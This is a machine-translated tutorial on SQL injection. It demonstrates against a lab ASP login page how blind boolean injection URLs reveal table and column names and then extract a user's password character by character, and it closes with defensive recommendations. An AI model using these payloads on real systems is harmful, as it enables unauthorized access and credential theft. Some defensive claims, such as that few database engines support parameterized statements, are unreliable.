SQL injection Instance Analysis

What is a SQL injection attack? Quote Baidu Encyclopedia's explanation:

SQL injection _ Baidu Encyclopedia:

SQL injection, by inserting a SQL command into a Web form to submit or entering a query string for a domain name or page request, eventually achieves a malicious SQL command that deceives the server. Specifically, it is the ability to inject (malicious) SQL commands into the background database engine execution using existing applications, which can be obtained by entering (malicious) SQL statements in a Web form to a database on a Web site that has a security vulnerability, rather than executing the SQL statement as the designer intended. [1] For example, many of the previous film and television sites leaked VIP membership password is mostly through the Web form to submit query characters, such forms are particularly vulnerable to SQL injection attacks.

The SQL injection attack refers to the introduction of a special input as a parameter to the Web application, which is mostly a combination of SQL syntax, the execution of SQL statements to perform the actions of the attacker, the main reason is that the program does not carefully filter the user input data, resulting in illegal data intrusion system.

SQL injection Instance Analysis
Detailed steps

1. Run Aspwebserver for the given web system

SQL injection Instance Analysis

2. Enter the login page for the SQL Injection Vulnerability test

Normal Login:

User name: admin Password: admin

SQL injection Instance Analysis

SQL Injection Vulnerability Test:

Add a single quotation mark after the normal user name admin, and click "Sign In"

or enter Http://172.18.3.13:81/login.asp?name=admin ' &pass=admin directly in the URL address bar

If there is an error, it proves that there is no filtering, there is a SQL injection vulnerability

SQL injection Instance Analysis

Add a single quotation mark after the normal user name admin, and click "Sign In"

SQL injection Instance Analysis

Error

SQL injection Instance Analysis

Enter Http://172.18.3.13:81/login.asp?name=admin ' &pass=admin directly in the URL address bar

Login Error

A logon error has proved a SQL injection vulnerability.

3.SQL Injection Attack

Construct a target address that can function correctly

Input http://172.18.3.13:81/login.asp?name=admin &pass=admin ' and ' 1=1

The original SQL statement is select * from data Where uname= ' admin ', the condition is not changed, but the receive password is Admin ' and ' 1=1

Logon failure

SQL injection Instance Analysis

Input http://172.18.3.13:81/login.asp?pass=admin&name=admin ' and 1=1 and ' a ' = ' a

The original SQL statement is select * from data Where uname= ' admin ' and 1=1 and ' a ' = ' a '

Login successful

SQL injection Instance Analysis

The target address that can run correctly has been constructed successfully, so you can replace the 1=1 section with SQL query statements, and then test the database table name, the field name in the table, the user and password length, the user, and the password

4. Guess the database table name

Http://172.18.3.13:81/login.asp?pass=admin&name=admin ' and (select COUNT (*) from data) >0 and ' a ' = ' a

SQL injection Instance Analysis

Successful, indicating that the data table name is the database, and if it is unsuccessful, it can be tested repeatedly until the table name is successfully guessed.

5. Guess the database field name

Http://172.18.3.13:81/login.asp?pass=admin&name=admin ' and (select COUNT (uname) from data) >0 and ' a ' = ' a

If the User name field is uname, you are prompted to log in successfully

Similarly, you can guess the password field upass

SQL injection Instance Analysis

Guess User Name field name, login error

SQL injection Instance Analysis

Guessing User name field uname, login successful

Description The User Name field in the database is uname

SQL injection Instance Analysis

Guessing password field UPass, login successful

Description The password field in the database is UPass

6. Guess the length of the password

Known to have a user named "WUCM", first guess its password length is greater than 1

Http://172.18.3.13:81/login.asp?pass=admin&name=admin ' and (Select count (*) from data where uname= ' WUCM ' and Len ( UPass) >1) >0 and ' a ' = ' a

SQL injection Instance Analysis

Success, stating that the user "WUCM" password is greater than 1, continue to guess the password length is less than 10

Http://172.18.3.13:81/login.asp?pass=admin&name=admin ' and (Select count (*) from data where uname= ' WUCM ' and Len ( UPass) <10) >0 and ' a ' = ' a

SQL injection Instance Analysis

Success, stating "WUCM" password length is less than 10 bits, continue to guess its password length is less than 5

Http://172.18.3.13:81/login.asp?pass=admin&name=admin ' and (Select count (*) from data where uname= ' WUCM ' and Len ( UPass) <5) >0 and ' a ' = ' a

SQL injection Instance Analysis

Error, stating "WUCM" password length is greater than 5 bits, continue to guess its password length is greater than 8 bits

Http://172.18.3.13:81/login.asp?pass=admin&name=admin ' and (Select count (*) from data where uname= ' WUCM ' and Len ( UPass) >8) >0 and ' a ' = ' a

SQL injection Instance Analysis

Error, stating "WUCM" password length is less than 8 bits, continue to guess its password length equals 6 bits

Http://172.18.3.13:81/login.asp?pass=admin&name=admin ' and (Select count (*) from data where uname= ' WUCM ' and Len ( UPass) =6) >0 and ' a ' = ' a

SQL injection Instance Analysis

Success, stating "WUCM" has a password length of 6 bits

7. Guess the password

According to the previous test we already know that the user's password length bit 6 bits, next to the password to make a bit-by guess:

First Test whether the first digit is a number

Http://172.18.3.13:81/login.asp?pass=admin&name=admin ' and (Select count (*) from data where uname= ' WUCM ' and mid ( upass,1,1) < ' 9 ') >0 and ' a ' = ' a

SQL injection Instance Analysis

Error, indicating that the first digit of the password is not a number, test whether the bit letter

Http://172.18.3.13:81/login.asp?pass=admin&name=admin ' and (Select count (*) from data where uname= ' WUCM ' and mid ( upass,1,1) > ' a ') >0 and ' a ' = ' a

SQL injection Instance Analysis

Success, basic instructions the first digit of the password is the letter, then repeat the test, and constantly reduce the letter range, finally determine the first digit of the password is the letter "W"

Http://172.18.3.13:81/login.asp?pass=admin&name=admin ' and (Select count (*) from data where uname= ' WUCM ' and mid ( upass,1,1) = ' W ') >0 and ' a ' = ' a

SQL injection Instance Analysis

Success, description password first bit "W"

Similarly, the 6-bit password is bit-wise guess, and finally get the password "wcm987"

At this point we guessed that the user "WUCM" Password for "wcm987", the login test:

SQL injection Instance Analysis

Log in successfully, proving that the entire guessing process and the resulting password are correct

ways to prevent SQL injection attacks:

Since SQL injection attacks are so harmful, how can we prevent them? The following recommendations may help database administrators prevent SQL injection attacks.

1, the ordinary user and the system administrator user's permission to have the strict distinction.

If an ordinary user embeds another drop TABLE statement with a query statement, is it allowed to execute? Because the drop statement is related to the base object of the database, the user must have permission to manipulate the statement. In the authority design, for the end user, that is, the application software users, there is no need to give them the database object creation, deletion and other permissions. So even when they use SQL statements with embedded malicious code, the code will not be executed due to restrictions on user permissions. Therefore, in the design of the application, it is best to distinguish between the user of the system administrator and the ordinary user. This minimizes the harm to the database caused by injection attacks.

2, forcing the use of parameterized statements.

If you are writing an SQL statement, the variables entered by the user are not embedded directly into the SQL statement. Instead of passing this variable through parameters, it is possible to effectively prevent SQL injection attacks. That is, the user's input must not be directly embedded in the SQL statement. In contrast, the user's input must be filtered, or a parameterized statement is used to pass a user-entered variable. Parameterized statements use parameters instead of embedding user input variables into SQL statements. With this approach, most SQL injection attacks can be eliminated. Unfortunately, there are not many database engines that support parameterized statements. However, the database engineer should use parameterized statements when developing products.

3, strengthen the validation of user input.

In general, the prevention and control of SQL injection attacks can be used in two ways, one is to strengthen the user input content inspection and validation, and the second is to force the use of parameterized statements to pass user input content. In SQL Server database, there are more user input content validation tools that can help administrators to deal with SQL injection attacks. Tests the contents of a string variable, accepting only the desired value. Rejects input that contains binary data, escape sequences, and comment characters. This helps prevent script injection and prevents certain buffer overflow attacks. Test the size and data type of the user input and enforce appropriate restrictions and conversions. This helps to prevent intentional buffer overflow, which is more effective in preventing injection attacks.

If you can use a stored procedure to validate the user's input. A stored procedure enables filtering of user input variables, such as rejecting some special symbols. As in the malicious code above, as long as the stored procedure to filter out the semicolon, then this malicious code will be useless. Before executing the SQL statement, some special symbols can be rejected through the database's stored procedures. Without affecting the database application, you should let the database reject input that contains the following characters. such as the semicolon delimiter, it is the primary accomplice of a SQL injection attack. such as the comment delimiter. Annotations are only used when the data is designed. The general user's query statement is not necessary to comment on the content, it can be directly rejected, and usually do so without accidental loss. By rejecting these special symbols, they will be useless even if the malicious code is embedded in the SQL statement.

The user input is always validated by testing the type, length, format, and range to filter what the user has entered. This is a common and effective measure to prevent SQL injection attacks.

Example: JSP uses filters to prevent SQL injection

4. Use the security parameters that are available from the SQL Server database.

To reduce the negative impact of injection attacks on SQL Server databases, a relatively secure SQL parameter has been specifically designed in the SQL Servers database. In the database design process, engineers should try to use these parameters to eliminate malicious SQL injection attacks.

The parameters collection is provided in the SQL Server database. This collection provides the ability to type check and length validation. If the administrator takes the Parameters collection, the user input is treated as a character value rather than as an executable code. Even if the user enters content that contains executable code, the database is filtered out. Because at this point the database only treats it as a normal character. Another advantage of using the Parameters collection is that you can enforce type and length checks, and values outside the range will trigger an exception. If the user enters a value that does not conform to the specified type and length constraints, an exception occurs and is reported to the administrator. In this case, if the employee number defines the data type as a string, the length is 10 characters. The user input is a character-type data, but it has a length of 20 characters. An exception is thrown at this point because the user enters content that is longer than the database field length limit.

5, multi-layered environment How to prevent SQL injection attack?

In a multi-tier application environment, all data entered by the user should be validated before being allowed into the trusted zone. Data that does not pass the validation process should be rejected by the database and an error message is returned up one level. Implement multilayer validation. Precautions taken against rogue malicious users may be ineffective against a determined attacker. A better approach is to validate the input at the user interface and at subsequent points across all cross-trust boundaries. Validating data in a client application can prevent simple script injection. However, if the next layer believes its input has passed validation, any malicious user who can bypass the client can access the system without restrictions. Therefore, in the multi-layer application environment, in order to prevent the injection attack, it is necessary to work together, the client and the database side should adopt corresponding measures to prevent the SQL statement injection attack.

6, if necessary, use professional vulnerability scanning Tool to find the point that may be attacked.

Using a professional vulnerability scanning tool, you can help administrators find points that might be injected by SQL. However, the vulnerability scanning tool can only detect attack points and not be able to proactively defend against SQL injection attacks. Of course, this tool is often used by attackers. An attacker could use this tool to automatically search for an attack target and implement an attack. To this end, if necessary, enterprises should invest in a number of professional vulnerability scanning tools. A sophisticated vulnerability scanner differs from a network scanner, which specializes in locating SQL injection vulnerabilities in a database. The latest vulnerability scanner can look for newly discovered vulnerabilities. So with professional tools, you can help administrators discover SQL injection vulnerabilities and alert administrators to take proactive steps to prevent SQL injection attacks. If an attacker can find a SQL injection vulnerability that the database administrator has discovered and taken positive steps to block the vulnerability, then the attacker will not be able to stop.

7. Set Trap account:

Set up two accounts, one is the normal administrator account, one is anti-injection account. The anti-injection account set up much like the administrator, such as admin, to create the illusion of attracting software detection, and password is greater than the Chinese characters above the word, forcing the software to analyze the account when the full load state or even the depletion of resources and the crash.

Attack and defense have always been two sides of the opposite, there is a new attack way there will be a better way to protect! In the computer network, the two are to achieve common progress through long-term competition; No system is perfect, and since we cannot develop an absolutely secure system, we must always guard against all possible attacks. A bug in time to repair, so as to ensure that our system security and stability!

Manuscripts: Custom Development www1.qixoo.com

SQL injection Instance Analysis